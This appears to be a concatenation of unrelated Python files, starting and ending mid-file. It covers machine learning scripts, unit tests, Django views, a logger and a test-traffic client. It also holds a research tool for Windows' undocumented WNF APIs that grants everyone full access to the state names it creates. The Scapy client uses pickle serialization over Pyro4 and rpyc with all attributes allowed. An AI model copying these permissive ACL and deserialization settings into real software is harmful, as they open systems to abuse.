= np.zeros(1) for i in range(num): temp = gc.predict(train_images[i*1000:(i+1)*1000,:]) y = np.concatenate((y,temp)) temp = gc.predict(train_images[num*1000:,:]) y = np.concatenate((y,temp)) return y[1:] def parse_args(): parser = argparse.ArgumentParser() parser.add_argument("--model", dest="model", type=str, default=None, help="gcfoest Net Model File") args = parser.parse_args() return args if __name__ == "__main__": args = parse_args() config=load_json('IP.json') gc = GCForest(config) # If the model you use cost too much memory for you. # You can use these methods to force gcforest not keeping model in memory # gc.set_keep_model_in_mem(False), default is TRUE. f=h5py.File('IP28-28-27.h5','r') train_images=f['data'][:] train_labels=f['label'][:] f.close() #f=open('paviaU.data','rb') #train_images=pickle.load(f) #train_labels=pickle.load(f) #f.close() train_labels = np.argmax(train_labels,1) indices = np.arange(train_images.shape[0]) shuffled_indices = np.random.permutation(indices) images = train_images[shuffled_indices] labels = train_labels[shuffled_indices] n_classes = labels.max() + 1 i_labeled = [] for c in range(n_classes): i = indices[labels==c][:5]##change sample number i_labeled += list(i) X_train = images[i_labeled] X_train = X_train.reshape(-1,27,28,28) y_train = labels[i_labeled] #y_train = np.argmax(y_train,1) #train_labels = np.argmax(train_labels,1) X_train_enc = gc.fit_transform(X_train, y_train) # X_enc is the concatenated predict_proba result of each estimators of the last layer of the GCForest model # X_enc.shape = # (n_datas, n_estimators * n_classes): If cascade is provided # (n_datas, n_estimators * n_classes, dimX, dimY): If only finegrained part is provided # You can also pass X_test, y_test to fit_transform method, then the accracy on test data will be logged when training. # X_train_enc, X_test_enc = gc.fit_transform(X_train, y_train, X_test=X_test, y_test=y_test) # WARNING: if you set gc.set_keep_model_in_mem(True), you would have to use # gc.fit_transform(X_train, y_train, X_test=X_test, y_test=y_test) to evaluate your model. train_images = train_images.reshape(-1,27,28,28) y_pred = get_label(gc, train_images) acc = accuracy_score(train_labels, y_pred) print(acc) 1-10 # Copyright 2018 Recruit Communications Co., Ltd. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import unittest from pyqubo import PlaceholderProd class TestPlaceholderProd(unittest.TestCase): def test_equality(self): term_key1 = PlaceholderProd({"a": 1, "b": 2}) term_key2 = PlaceholderProd({"a": 1, "b": 2}) term_key3 = PlaceholderProd({"a": 2, "b": 1}) self.assertTrue(term_key1 == term_key2) self.assertTrue(term_key1 != term_key3) self.assertTrue(term_key1 != 1) def test_equality_const(self): term_key1 = PlaceholderProd({}) term_key2 = PlaceholderProd({}) term_key3 = PlaceholderProd({'a': 1}) self.assertTrue(term_key1.is_constant()) self.assertEqual(term_key1, term_key2) self.assertNotEqual(term_key1, term_key3) def test_merge(self): term_key1 = PlaceholderProd({"a": 1, "b": 2}) term_key2 = PlaceholderProd({"a": 1, "b": 1}) term_key3 = PlaceholderProd({"a": 2, "b": 3}) term_key4 = PlaceholderProd({}) self.assertEqual(term_key3, PlaceholderProd.merge_term_key(term_key1, term_key2)) self.assertEqual(term_key1, PlaceholderProd.merge_term_key(term_key1, term_key4)) def test_evaluate(self): term_key1 = PlaceholderProd({"a": 1, "b": 2}) empty_key = PlaceholderProd({}) dict_value = {"a": 3.0, "b": 5.0} prod = term_key1.calc_product(dict_value) expected_prod = 75 self.assertEqual(expected_prod, prod) self.assertEqual(1, empty_key.calc_product({})) def test_repr(self): term_key1 = PlaceholderProd({"a": 2, "b": 3}) empty_key = PlaceholderProd({}) self.assertIn(repr(term_key1), "a^2*b^3") self.assertEqual(repr(empty_key), "const") 10-100 import functools import os import subprocess import time import unittest from test import support support.requires('audio') winsound = support.import_module('winsound') def sound_func(func): @functools.wraps(func) def wrapper(*args, **kwargs): try: ret = func(*args, **kwargs) except RuntimeError as e: if support.verbose: print(func.__name__, 'failed:', e) else: if support.verbose: print(func.__name__, 'returned') return ret return wrapper safe_Beep = sound_func(winsound.Beep) safe_MessageBeep = sound_func(winsound.MessageBeep) safe_PlaySound = sound_func(winsound.PlaySound) class BeepTest(unittest.TestCase): def test_errors(self): self.assertRaises(TypeError, winsound.Beep) self.assertRaises(ValueError, winsound.Beep, 36, 75) self.assertRaises(ValueError, winsound.Beep, 32768, 75) def test_extremes(self): safe_Beep(37, 75) safe_Beep(32767, 75) def test_increasingfrequency(self): for i in range(100, 2000, 100): safe_Beep(i, 75) def test_keyword_args(self): safe_Beep(duration=75, frequency=2000) class MessageBeepTest(unittest.TestCase): def tearDown(self): time.sleep(0.5) def test_default(self): self.assertRaises(TypeError, winsound.MessageBeep, 'bad') self.assertRaises(TypeError, winsound.MessageBeep, 42, 42) safe_MessageBeep() def test_ok(self): safe_MessageBeep(winsound.MB_OK) def test_asterisk(self): safe_MessageBeep(winsound.MB_ICONASTERISK) def test_exclamation(self): safe_MessageBeep(winsound.MB_ICONEXCLAMATION) def test_hand(self): safe_MessageBeep(winsound.MB_ICONHAND) def test_question(self): safe_MessageBeep(winsound.MB_ICONQUESTION) def test_keyword_args(self): safe_MessageBeep(type=winsound.MB_OK) class PlaySoundTest(unittest.TestCase): def test_errors(self): self.assertRaises(TypeError, winsound.PlaySound) self.assertRaises(TypeError, winsound.PlaySound, 'bad', 'bad') self.assertRaises(RuntimeError, winsound.PlaySound, 'none', winsound.SND_ASYNC | winsound.SND_MEMORY) self.assertRaises(TypeError, winsound.PlaySound, b'bad', 0) self.assertRaises(TypeError, winsound.PlaySound, 'bad', winsound. SND_MEMORY) self.assertRaises(TypeError, winsound.PlaySound, 1, 0) def test_keyword_args(self): safe_PlaySound(flags=winsound.SND_ALIAS, sound='SystemExit') def test_snd_memory(self): with open(support.findfile('pluck-pcm8.wav', subdir='audiodata'), 'rb' ) as f: audio_data = f.read() safe_PlaySound(audio_data, winsound.SND_MEMORY) audio_data = bytearray(audio_data) safe_PlaySound(audio_data, winsound.SND_MEMORY) def test_snd_filename(self): fn = support.findfile('pluck-pcm8.wav', subdir='audiodata') safe_PlaySound(fn, winsound.SND_FILENAME | winsound.SND_NODEFAULT) def test_aliases(self): aliases = ['SystemAsterisk', 'SystemExclamation', 'SystemExit', 'SystemHand', 'SystemQuestion'] for alias in aliases: with self.subTest(alias=alias): safe_PlaySound(alias, winsound.SND_ALIAS) def test_alias_fallback(self): safe_PlaySound('!"$%&/(#+*', winsound.SND_ALIAS) def test_alias_nofallback(self): safe_PlaySound('!"$%&/(#+*', winsound.SND_ALIAS | winsound. SND_NODEFAULT) def test_stopasync(self): safe_PlaySound('SystemQuestion', winsound.SND_ALIAS | winsound. SND_ASYNC | winsound.SND_LOOP) time.sleep(0.5) safe_PlaySound('SystemQuestion', winsound.SND_ALIAS | winsound. SND_NOSTOP) winsound.PlaySound(None, winsound.SND_PURGE) if __name__ == '__main__': unittest.main() # !/usr/bin/env python # -*- coding: utf-8 -*- # # Filename: database.py # Project: helpers # Author: # Created: Sunday, 18th October 2020 11:54:01 am # License: BSD 3-clause "New" or "Revised" License # Copyright (c) 2020 # Last Modified: Sunday, 18th October 2020 11:54:01 am # Modified By: from __future__ import print_function, division, absolute_import import importlib import inspect from types import ModuleType from typing import List, Union, Type import sdssdb.peewee import sdssdb.sqlalchemy from sdssdb.connection import DatabaseConnection, PeeweeDatabaseConnection, SQLADatabaseConnection from sdss_brain.exceptions import BrainError db_type = Union[Type[PeeweeDatabaseConnection], Type[SQLADatabaseConnection], Type[sdssdb.peewee.BaseModel], Type[sdssdb.sqlalchemy.BaseModel], Type[ModuleType]] class DatabaseHandler(object): """ Convenience class for handling an sdssdb database connection / ORM A convenience class to provide a simple API to any sdssdb database or ORM. Accepts as input any sdssdb peewee or sqlalchemy ORM Model, DatabaseConnection, or a sdssdb schema ORM python module. Given valid input will determine, which database, schema, set of ORMs, and primary ORM. Parameters ---------- db_input : db_type The type of sdssdb database input. Attributes ---------- orm : str Indicates whether the ORM is peewee or sqlalchemy model : `~sdssdb.peewee.BaseModel` | `~sdssdb.sqlalchemy.BaseModel` Any database ORM Model models : py module A database schema python module containing all ORM models db : `~sdssdb.connection.DatabaseConnection` A database connection object schema : str The schema name session : `~sqlalchemy.orm.session.Session` A sqlalchemy database session needed for querying """ def __init__(self, db_input: db_type = None) -> None: self.orm = None self.model = None self.models = None self._session = None self.db = None self.schema = None self._determine_input(db_input) def __repr__(self) -> str: d = {'orm': self.orm, 'model': self.model.__name__ if self.model else None, 'schema': self.schema, 'db': self.db.dbname if self.db else None} repr_items = ', '.join([m for m in map(lambda x: '{0}="{1}"'.format( *x) if x[1] else '', d.items()) if m]) return f'' def _determine_input(self, value: db_type = None) -> None: """ Determine the type of database input Determines whether the input is a valid sdssdb ORM Model, DatabaseConnection, or schema module, and sets the instance attributes for orm, db, schema, model and models. Parameters ---------- value : db_type, optional The type of ``sdssdb`` database input, by default None """ if not value: return if any(self._is_a_model(value)): self._check_models(value) elif any(self._is_a_db(value)): self._check_dbs(value) elif any(self._is_a_schema(value)): self._check_schema(value) @staticmethod def _is_a_model(value: db_type) -> List[bool]: """ Conditional check if input is an ORM Model """ if not inspect.isclass(value): return [None, None] pmodel, smodel = issubclass(value, sdssdb.peewee.BaseModel), issubclass( value, sdssdb.sqlalchemy.BaseModel) return [pmodel, smodel] def _check_models(self, value: db_type) -> None: """ Checks a sdssdb ORM Given any sdssdb peewee or sqlalchemy ORM, extracts relevant information on the ORM, database, schema name, and set of ORM models. Parameters ---------- value : `~sdssdb.peewee.BaseModel` | `~sdssdb.sqlalchemy.BaseModel` A valid sdssdb peewee or sqla ORM """ pmodel, smodel = self._is_a_model(value) self.model = value self.models = importlib.import_module(value.__module__) if pmodel: self.orm = 'peewee' self.schema = value._meta.schema self.db = value._meta.database elif smodel: self.orm = 'sqla' self.schema = value._schema self.db = getattr(self.models, 'database', None) self._set_session() @staticmethod def _is_a_db(value: db_type) -> List[bool]: """ Conditional check if input is a DatabaseConnection """ pdatabase, sdatabase = isinstance(value, PeeweeDatabaseConnection), isinstance( value, SQLADatabaseConnection) return [pdatabase, sdatabase] def _check_dbs(self, value: Type[DatabaseConnection]) -> None: """ Checks a sdssdb database connection Given a sdssdb peewee or sqlalchemy database connection, extracts relevant information on the ORM, database, schema name, and set of ORM models. Parameters ---------- value : `~sdssdb.connection.DatabaseConnection` A valid sdssdb database connection """ pdatabase, sdatabase = self._is_a_db(value) self.db = value if pdatabase: self.orm = 'peewee' elif sdatabase: self.orm = 'sqla' self._set_session() @staticmethod def _is_a_schema(value: db_type) -> List[bool]: """ Conditional check if input is a schema module """ is_module = inspect.ismodule(value) name = value.__name__ if is_module else '' pschema, sschema = is_module and 'peewee' in name, is_module and 'sqlalchemy' in name return [pschema, sschema] def _check_schema(self, value: Type[ModuleType]) -> None: """ Checks a sdssdb schema module file Given a schema module files, extracts relevant information on the ORM, database, schema name, and set of ORM models Parameters ---------- value : py module A valid sdssdb database schema module file """ pschema, sschema = self._is_a_schema(value) self.models = value self.db = getattr(value, 'database', None) self.schema = self.models.__name__.split('.', 2)[-1] if pschema: self.orm = 'peewee' elif sschema: self.orm = 'sqla' self._set_session() @property def connected(self) -> bool: """ Returns True if the database is connected """ return self.db.connected if self.db else None def _set_session(self): """ Sets the sqla database Session if db is connected """ if self.connected: self._session = self.db.Session() @property def session(self): """ A sqlalchemy database session needed for querying Returns ------- `~sqlalchemy.orm.session.Session` A sqlalchemy database session needed for querying Raises ------ AttributeError when the orm is "peewee" """ if self.orm == 'peewee': raise AttributeError('peewee ORMs do not use sessions. To query, access the model ' 'directly or load a sqlalchemy ORM') return self._session def load_schema(self, schema: str): """ Load an sdssdb schema module Loads an input sdssdb schema module name from the currently loaded database and into the handler. The input name can be dot-qualified as "[orm].[database].[schema]" and it will attempt to find and load the correct module. For example ``targetdb``, ``sdss5db.targetdb``, ``peewee.sdss5db.targetdb`` are all valid names. Parameters ---------- schema : str The name of an sdssdb schema module Raises ------ TypeError when the input is not a string BrainError when no database connection is present BrainError when no schema module is found by importlib.import_module """ if type(schema) != str: raise TypeError(f'Input {schema} must be a string.') if not self.db: raise BrainError(f'No db present. Cannot load schema {schema}.') orm = 'sqlalchemy' if self.orm == 'sqla' else 'peewee' dbname = self.db.dbname if self.db else '' if schema.count('.') == 0: modname = f'sdssdb.{orm}.{dbname}.{schema}' elif schema.count('.') == 1: modname = f'sdssdb.{orm}.{schema}' elif schema.count('.') == 2: modname = f'sdssdb.{schema}' else: modname = schema try: self.models = importlib.import_module(modname) except ModuleNotFoundError as e: raise BrainError(f'No module found matching {modname}') from e else: self.schema = self.models.__name__.split('.', 2)[-1] self.model = None def load_model(self, model: str): """ Loads an ORM model Loads an input ORM model name from the currently loaded database and schema into the handler. Parameters ---------- model : str The name of an ORM model to load Raises ------ BrainError when no valid schema is set AttributeError when no model is found within the loaded schema """ if not self.models: raise BrainError('No valid schema set containing ORM models.') model_obj = getattr(self.models, model, None) if not model_obj: raise AttributeError(f'schema {self.schema} does not have model {model}') self.model = model_obj def close(self): """ Close database connections and sessions """ if self.orm == 'sqlalchemy': self.session.close() elif self.orm == 'peewee': self.db.close() 1-10 import os def setup(conf): if 'windows' in conf.env.VALID_PLATFORMS: conf.start_msg_setup() if conf.check_lib( ['kernel32', 'user32', 'advapi32', 'ole32', 'oleaut32', 'uuid', 'shell32'], includepath=[os.path.join(conf.path.parent.abspath(), 'api.windows')] ): conf.end_msg('from system') else: conf.end_msg('not found', color='RED') """ Copyright (c) 2018 . All Rights Reserved. https://blog.quarkslab.com/author/gwaby.html """ import ctypes import argparse import win32security from enum import Enum from hexdump import hexdump import sys from WellKnownWnfNames import g_WellKnownWnfNames # comment this if you don't have the file (you can generate it with ) ZwCreateWnfStateName = ctypes.windll.ntdll.ZwCreateWnfStateName ZwUpdateWnfStateData = ctypes.windll.ntdll.ZwUpdateWnfStateData ZwQueryWnfStateData = ctypes.windll.ntdll.ZwQueryWnfStateData RtlSubscribeWnfStateChangeNotification = ctypes.windll.ntdll.RtlSubscribeWnfStateChangeNotification RtlUnsubscribeWnfStateChangeNotification = ctypes.windll.ntdll.RtlUnsubscribeWnfStateChangeNotification CreateEventA = ctypes.windll.kernel32.CreateEventA WaitForSingleObject = ctypes.windll.kernel32.WaitForSingleObject CloseHandle = ctypes.windll.kernel32.CloseHandle GENERIC_ALL = 0x10000000 WNF_STATE_KEY = 0x41C64E6DA3BC0074 class WNF_STATE_NAME_bits(ctypes.LittleEndianStructure): _fields_ = [ ("Version", ctypes.c_ulonglong, 4), ("NameLifetime", ctypes.c_ulonglong, 2), ("DataScope", ctypes.c_ulonglong, 4), ("PermanentData", ctypes.c_ulonglong, 1), ("Unique", ctypes.c_ulonglong, 53), ("value", ctypes.c_ulonglong) ] class WNF_STATE_NAME_INTERNAL(ctypes.Union): _fields_ = [ ("b", WNF_STATE_NAME_bits), ("value", ctypes.c_ulonglong) ] class WNF_DATA_SCOPE(Enum): WnfDataScopeSystem, WnfDataScopeSession, WnfDataScopeUser, WnfDataScopeProcess, WnfDataScopeMachine = range(5) class WNF_STATE_NAME_LIFETIME(Enum): WnfWellKnownStateName, WnfPermanentStateName, WnfPersistentStateName, WnfTemporaryStateName = range(4) WnfLifetimeStrings = [ "Well-Known", "Permanent", "Volatile", "Temporary" ] WnfDataScopeStrings = [ "System", "session", "User", "Process", "Machine" ] class WnfCom(object): class NOTIFY_CONTEXT(ctypes.Structure): _fields_ = [ ("NotifyEvent", ctypes.c_ulong), ("EventDestroyed", ctypes.c_bool) ] def __init__(self, WnfName = 0): # generic stuff self.StateName = ctypes.c_ulonglong(0) self.internalName = WNF_STATE_NAME_INTERNAL() self.verbose = True if WnfName != 0: self.SetStateName(WnfName) # callback for the listener self.callback_type = ctypes.CFUNCTYPE( ctypes.c_ulonglong, ctypes.c_ulonglong, ctypes.c_ulong, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_ulong) self.callback = self.callback_type(self.NotifyCallback) # security descriptor used for creating the server part everyoneSid = win32security.CreateWellKnownSid(1, None) acl = win32security.ACL() acl.AddAccessAllowedAce(win32security.ACL_REVISION, GENERIC_ALL, everyoneSid) pySd = win32security.SECURITY_DESCRIPTOR() pySd.SetSecurityDescriptorDacl(True, acl, False) self.rawSd = ctypes.create_string_buffer(memoryview(pySd).tobytes()) def TooglePrint(self): self.verbose = not self.verbose def pprint(self, string): if self.verbose: print(string) def PrintInternalName(self): self.pprint("Encoded Name: {:x}, Clear Name: {:x}\n\t" "Version: {}, Permanent: {}, Scope: {}, Lifetime: {}, Unique: {}\n".format( self.StateName.value, self.internalName.value, self.internalName.b.Version, "Yes" if self.internalName.b.PermanentData else "No", WnfDataScopeStrings[self.internalName.b.DataScope], WnfLifetimeStrings[self.internalName.b.NameLifetime], self.internalName.b.Unique)) def SetStateName(self, WnfName): tmpName = 0 try: tmpName = g_WellKnownWnfNames[WnfName.upper()] except: if len(WnfName)>2 and WnfName[1] == 'x': WnfName = WnfName[2:] try: tmpName = int(WnfName, 16) except: tmpName = 0 self.pprint("[Error] Could not validate the provided name") return False self.StateName = ctypes.c_longlong(tmpName) self.internalName.value = ctypes.c_ulonglong(tmpName ^ WNF_STATE_KEY) return True def CreateServer(self): status = ZwCreateWnfStateName(ctypes.byref(self.StateName), WNF_STATE_NAME_LIFETIME.WnfTemporaryStateName.value, WNF_DATA_SCOPE.WnfDataScopeMachine.value, False, 0, 0x1000, self.rawSd) if status != 0: self.pprint("[Error] Failed: {}".format(status)) return 0 self.pprint("[SERVER] StateName created: {:x}\n".format(self.StateName.value)) self.internalName.value = ctypes.c_ulonglong(self.StateName.value ^ WNF_STATE_KEY) return self.StateName.value def Write(self, Data = b"Hello World"): if self.StateName.value == 0: self.pprint("[Error] Server not initialized. Use CreateServer() or SetStateName().") return 0 if type(Data) != bytes: self.pprint("[Error] Could not read the data. Bytes string is expected.") return 0 self.PrintInternalName() dataBuffer = ctypes.c_char_p(Data) bufferSize = len(Data) status = ZwUpdateWnfStateData(ctypes.byref(self.StateName), dataBuffer, bufferSize, 0, 0, 0, 0) status = ctypes.c_ulong(status).value if status != 0: self.pprint("[Error] Could not write: 0x{:x}\n\t Maybe the data is too big or you don't have write access?".format(status)) else: self.pprint("State update: {} bytes written\n".format(bufferSize)) return status def Read(self): if self.StateName.value == 0: self.pprint("[Error] Client not initialized. Use SetStateName() to set a state name.") return False changeStamp = ctypes.c_ulong(0) dataBuffer = ctypes.create_string_buffer(4096) bufferSize = ctypes.c_ulong(ctypes.sizeof(dataBuffer)) res = ZwQueryWnfStateData(ctypes.byref(self.StateName), 0, 0, ctypes.byref(changeStamp), ctypes.byref(dataBuffer), ctypes.byref(bufferSize) ) bufferSize = 0 if res !=0 else bufferSize.value hexdump(dataBuffer.raw[0:bufferSize]) return changeStamp.value, dataBuffer, bufferSize def Listen(self): if self.StateName.value == 0: self.pprint("[Error] Server not initialized. Use CreateServer() or SetStateName().") return False wnfSubscription = ctypes.c_void_p(0) notifyContext = self.NOTIFY_CONTEXT() notifyContext.EventDestroyed = False notifyContext.NotifyEvent = CreateEventA(0, 0, 0, 0) if(notifyContext.NotifyEvent == 0): self.pprint("[Error] Could not create event") return False self.pprint("[CLIENT]: Event registered: {}\n".format(notifyContext.NotifyEvent)) res = RtlSubscribeWnfStateChangeNotification( ctypes.byref(wnfSubscription), self.StateName, 0, self.callback, ctypes.byref(notifyContext), 0, 0, 0) if res != 0: self.pprint("[Error] WNF Sub Failed: {:x}".format(ctypes.c_ulong(res).value)) CloseHandle(notifyContext.NotifyEvent) return False while not notifyContext.EventDestroyed: try: WaitForSingleObject(notifyContext.NotifyEvent, 1500) except KeyboardInterrupt: break self.pprint("[CLIENT]: Shutting down...") CloseHandle(notifyContext.NotifyEvent) RtlUnsubscribeWnfStateChangeNotification(wnfSubscription) return True def NotifyCallback (self, StateName, ChangeStamp, TypeId, CallbackContext, Buffer, BufferSize): notifyContext = ctypes.cast(CallbackContext, ctypes.POINTER(self.NOTIFY_CONTEXT)) ArrayType = ctypes.c_char * BufferSize if Buffer == None and BufferSize == 0 and ChangeStamp == 0: self.pprint("[CLIENT]: NAME DESTROYED") notifyContext.contents.EventDestroyed = True else: buff = ctypes.cast(Buffer, ctypes.POINTER(ArrayType)).contents[:BufferSize] self.pprint("[CLIENT] Timestamp: 0x{:x} Size: 0x{:x}\n Data:".format( ChangeStamp, BufferSize)) output = b''.join(map(lambda x:x.to_bytes(1, byteorder='little'), buff)) hexdump(output) return 0 ############### MAIN ############### if __name__ == "__main__": argParser = argparse.ArgumentParser(description="") argParser.add_argument("WNF_NAME", nargs='?', type=str, help="state name") args = argParser.parse_args() wnfserver = WnfCom() if args.WNF_NAME: if not wnfserver.SetStateName(args.WNF_NAME): sys.exit("[Error] State name unknown.") else: wnfserver.CreateServer() wnfserver.Write() while True: try: Data = input(">") except KeyboardInterrupt as e: break wnfserver.Write(Data.encode()) wnfserver.Read()import logging import os import inspect ALL_LOGS_FILE = 'logs.log' class Singleton(type): _instances = {} def __call__(cls, *args, **kwargs): if cls not in cls._instances: cls._instances[cls] = super(Singleton, cls).__call__(*args, **kwargs) return cls._instances[cls] class MyLogger(metaclass=Singleton): console_logger = None file_logger = None def __init__(self, all_logs_file_name=ALL_LOGS_FILE): logging.basicConfig( level=logging.INFO, format="%(asctime)s - %(threadName)s - %(filename)s - %(message)s", handlers=[ logging.StreamHandler() ]) all_logs_file_name = os.path.join(os.getcwd(), all_logs_file_name) fh = logging.FileHandler(all_logs_file_name) fh.setLevel(logging.INFO) fh.setFormatter(logging.Formatter("%(asctime)s - %(threadName)s - %(message)s")) logging.getLogger(__name__ + '.file_logger').addHandler(fh) self.file_logger = logging.getLogger(__name__ + '.file_logger') # console logger self.console_logger = logging.getLogger(__name__ + '.console_logger') @staticmethod def __get_call_info(): stack = inspect.stack() fn = stack[2][1] ln = stack[2][2] func = stack[2][3] return fn, func, ln def info(self, message, *args, file=False): if file: self.file_logger.info(message, *args) else: self.console_logger.info(message, *args) def debug(self, message, *args, file=True): if file: self.file_logger.debug(message, *args) else: self.console_logger.info(message, *args) def warning(self, message, *args, file=True): if file: self.file_logger.warning(message, *args) else: self.console_logger.warning(message, *args) def error(self, message, *args, exc_info=1, file=True): if file: self.file_logger.error(message, *args, exc_info=exc_info) else: self.console_logger.error(message, *args, exc_info=exc_info) def critical(self, message, *args, file=True): if file: self.file_logger.critical(message, *args) else: self.console_logger.critical(message, *args)#!/usr/bin/env python # -*- coding: utf-8 -*- from django.conf.urls import patterns, url from django.views.generic import ListView, DetailView from .views import ( MapView, AddView, ParamRowView, TestRowView, MeasurementView, DownloadView, ReportView, MeasurementPopupView ) from .models import Test urlpatterns = patterns( '', url(r'^map/', MapView.as_view(), name='observations-map'), url(r'^report/', ReportView.as_view(), name='observations-report'), url(r'^download/', DownloadView.as_view(), name='observations-download'), url(r'^detail/(?P\d+)/$', MeasurementView.as_view(), name='observations-detail'), url(r'^detail/(?P\d+)/popup/$', MeasurementPopupView.as_view(), name='observations-detail-popup'), url(r'^add/$', AddView.as_view(), name='observations-add'), url(r'^add/param/$', ParamRowView.as_view(), name='observations-add-param'), url(r'^add/test/$', TestRowView.as_view(), name='observations-add-test'), url(r'^tests/$', ListView.as_view( template_name='test_list.html', queryset=Test.objects.order_by('parameter__name') ), name='observations-tests'), url(r'^tests/(?P\d+)/$', DetailView.as_view( model=Test, template_name='test_detail.html' ), name='observations-test-detail'), ) 0 from django.shortcuts import render from django.http import HttpResponse, HttpResponseRedirect from pmpapp.forms import LoginForm, RegisterForm from django.contrib.auth import authenticate, login, logout from django.urls import reverse from django.contrib.auth.decorators import login_required # Create your views here. def index(request): return render(request, 'pmpapp/index.html') @login_required def user_logout(request): logout(request) return HttpResponseRedirect(reverse('pmp:index')) def register(request): registered = False if request.method == 'POST': loginForm = LoginForm(data=request.POST) registerForm = RegisterForm(data=request.POST) if loginForm.is_valid() and registerForm.is_valid(): user = loginForm.save() user.set_password() user.save() userInfo = registerForm.save(commit=False) userInfo.user = user if 'profile_picture' in request.FILES: userInfo.profile_picture = request.FILES['profile_picture'] userInfo.save() registered = True else: print(loginForm.errors, registerForm.errors) else: loginForm = LoginForm() registerForm = RegisterForm() return render(request, 'pmpapp/register.html', {'loginForm': loginForm, 'registerForm': RegisterForm, 'registered': registered}) def user_login(request): if request.method == 'POST': username = request.POST.get('username') password = request.POST.get('password') user = authenticate(username=username, password=password) if user: if user.is_active: login(request, user) return HttpResponseRedirect(reverse('pmp:index')) else: print('User account is inactive') else: print('login failed for user: {}'.format(username)) return HttpResponse('Invalid login credentials') else: return render(request, 'pmpapp/login.html', {}) import os, sys import pdb import time import torch import utils import argparse import importlib import numpy as np import torch.nn as nn import torch.optim as optim torch.cuda.set_device(0) device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu") def save_base(model, instrument, num): data = np.load("/data1/xyf/base/" + instrument + "_train_data.npy") idx = np.random.permutation(data.shape[0]) base = [] for i in range(num): index = idx[i] X_test = torch.from_numpy(data[index]).unsqueeze(0) X_test = X_test.type(torch.FloatTensor).to(device) with torch.no_grad(): model.eval() L, map = model(X_test) L = L.view(-1).cpu().numpy() Relation_Map = map.squeeze(0).squeeze(0).cpu().numpy() index = L.argmax() index = Relation_Map[:,index].argmax() X_test = X_test.squeeze(0).cpu().numpy() W = X_test[:, index] base.append(W) np.save("./base_aug/"+instrument + "_base.npy", np.array(base),) print(instrument + " complete.") if __name__ == "__main__": model_path = "201812132050/snapshot.model" model = torch.load(model_path, map_location=lambda storage, loc: storage.cuda(0)) num = 300 save_base(model, "accordion", num) save_base(model, "acoustic_guitar", num) save_base(model, "cello", num) save_base(model, "flute", num) save_base(model, "saxophone", num) save_base(model, "trumpet", num) save_base(model, "violin", num) save_base(model, "xylophone", num) mykolaf/sonic-mgmtspytest/spytest/tgen/tg_scapy.py1-10 import os import sys import copy import logging class ScapyClient(object): def __init__(self, logger, port=8009): self.conn = None self.tg_port = port self.logger = logger or logging.getLogger() self.use_pyro = True self.filemode = bool(os.getenv("SPYTEST_FILE_MODE")) self.tg_ip = getattr(self, "tg_ip", None) self.tg_port_list = getattr(self, "tg_port_list", []) self.tg_port_handle = getattr(self, "tg_port_handle", {}) def log_call(self, fname, **kwargs): self.logger.info("TODO {} {}".format(fname, **kwargs)) def save_log(self, name, data): self.logger.info("TODO {} {}".format(name, data)) def api_fail(self, msg): self.logger.info("TODO {}".format(msg)) def log_info(self, *args): self.logger.info(*args) def server_control(self, phase, context): if self.filemode: return elif phase == "clean-all": self.execute(self.conn.server_control, "clean-all", "") elif phase == "pre-test": self.execute(self.conn.server_control, "add-log", "test-start " + context) elif phase == "post-test": self.execute(self.conn.server_control, "add-log", "test-finish " + context) elif phase == "pre-module-prolog": self.execute(self.conn.server_control, "init-log", context) elif phase == "post-module-epilog": data = self.execute(self.conn.server_control, "read-log", context) self.log_info("ScapyClient instrument: {} {}".format(phase, context)) context = "tests_{}".format(context.replace(".py", ".tgen")) context = context.replace("/", "_") self.log_info("ScapyClient instrument: {} {}".format(phase, context)) self.save_log(context, data) else: self.log_info("ScapyClient instrument: ignored {} {}".format(phase, context)) def rpyc_connect(self): import rpyc try: config={"allow_pickle" : True, "sync_request_timeout": 300, "allow_public_attrs": True, "allow_all_attrs": True, "instantiate_oldstyle_exceptions" : True} return rpyc.connect(self.tg_ip, self.tg_port, config=config) except Exception as e: print (e) raise ValueError("Failed to connect to scapy server {}".format(e)) def scapy_connect(self, dry_run=False): self.tg_ns = 'scapy' if self.filemode: return None if self.use_pyro: import Pyro4 uri = "PYRO:scapy-tgen@{}:{}".format(self.tg_ip, self.tg_port) Pyro4.config.SERIALIZER = "pickle" self.conn = Pyro4.Proxy(uri) else: self.conn2 = self.rpyc_connect() self.conn = self.conn2.root try: dbg_lvl = int(os.getenv("SPYTEST_SCAPY_DBG_LVL", "1")) except: dbg_lvl = 1 try: max_pps = int(os.getenv("SPYTEST_SCAPY_MAX_PPS", "100")) except: max_pps = 100 self.execute(self.conn.server_control, "set-dbg-lvl", dbg_lvl) self.execute(self.conn.server_control, "set-dry-run", dry_run) self.execute(self.conn.server_control, "set-max-pps", max_pps) self.execute(self.conn.server_control, "init-log", "default") res = self.tg_connect(port_list=self.tg_port_list) self.tg_port_handle.clear() for port in self.tg_port_list: self.tg_port_handle[port] = res['port_handle'][port] return None def log_api(self, *args, **kws): func = sys._getframe(1).f_code.co_name self.log_call(func, **kws) def fix_newstr(self, kws): from future.types import newstr for key, value in kws.items(): if isinstance(value, newstr): kws[key] = str(value) def execute(self, func, *args, **kws): try: res = func(*args, **kws) return copy.copy(res) except Exception as exp: msg = "{}".format(exp) if self.use_pyro: import Pyro4 msg = msg + "".join(Pyro4.util.getPyroTraceback()) self.api_fail(msg) raise exp def tg_connect(self, *args, **kws): self.log_api(*args, **kws) if self.filemode: return None return self.execute(self.conn.tg_connect, *args, **kws) def tg_disconnect(self, *args, **kws): self.log_api(*args, **kws) if self.filemode: return None return self.execute(self.conn.tg_disconnect, *args, **kws) def tg_traffic_control(self, *args, **kws): self.log_api(*args, **kws) if self.filemode: return None return self.execute(self.conn.tg_traffic_control, *args, **kws) def tg_interface_control(self, *args, **kws): self.log_api(*args, **kws) if self.filemode: return None return self.execute(self.conn.tg_interface_control, *args, **kws) def tg_packet_control(self, *args, **kws): self.log_api(*args, **kws) if self.filemode: return None return self.execute(self.conn.tg_packet_control, *args, **kws) def tg_packet_stats(self, *args, **kws): self.log_api(*args, **kws) if self.filemode: return None return self.execute(self.conn.tg_packet_stats, *args, **kws) def tg_traffic_config(self, *args, **kws): self.log_api(*args, **kws) if 